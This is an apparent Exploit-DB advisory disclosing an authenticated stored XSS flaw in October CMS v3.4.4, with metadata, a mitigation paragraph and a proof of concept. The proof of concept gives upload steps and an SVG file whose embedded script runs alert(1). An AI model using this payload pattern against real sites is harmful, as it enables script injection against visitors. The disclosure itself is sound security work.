October CMS v3.4.4 - Stored Cross-Site Scripting (XSS) (Authenticated)

vendor:

October CMS

by:

Okan Kurtulus

5.5

CVSS

MEDIUM

Stored Cross-Site Scripting (XSS)

CWE

Product Name: October CMS

Affected Version From: v3.4.4

Affected Version To: v3.4.4

Patch Exists: NO

Related CWE:

CPE: a:october_cms:october_cms:3.4.4

Metasploit:

Other Scripts:

Platforms Tested: Ubuntu 22.04

2023

October CMS v3.4.4 – Stored Cross-Site Scripting (XSS) (Authenticated)

An authenticated user with file upload authority can upload a specially crafted SVG file containing a malicious JavaScript payload. When the file is accessed from the directory, the payload is executed, resulting in a cross-site scripting (XSS) attack.

Mitigation:

Implement input validation and sanitization techniques to prevent the execution of malicious scripts. Ensure that uploaded files are properly validated and restricted to safe formats.

Source

Exploit-DB raw data:

#Exploit Title: October CMS v3.4.4 - Stored Cross-Site Scripting (XSS) (Authenticated)
#Date: 29 June 2023
#Exploit Author: Okan Kurtulus
#Vendor Homepage: https://octobercms.com
#Version: v3.4.4
#Tested on: Ubuntu 22.04
#CVE : N/A

# Proof of Concept:
1– Install the system through the website and log in with any user with file upload authority.
2– Select "Media" in the top menu. Prepare an SVG file using the payload below.
3– Upload the SVG file and call the relevant file from the directory it is in. XSS will be triggered.

#Stored XSS Payload:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">
    alert(1);
  </script>
</svg>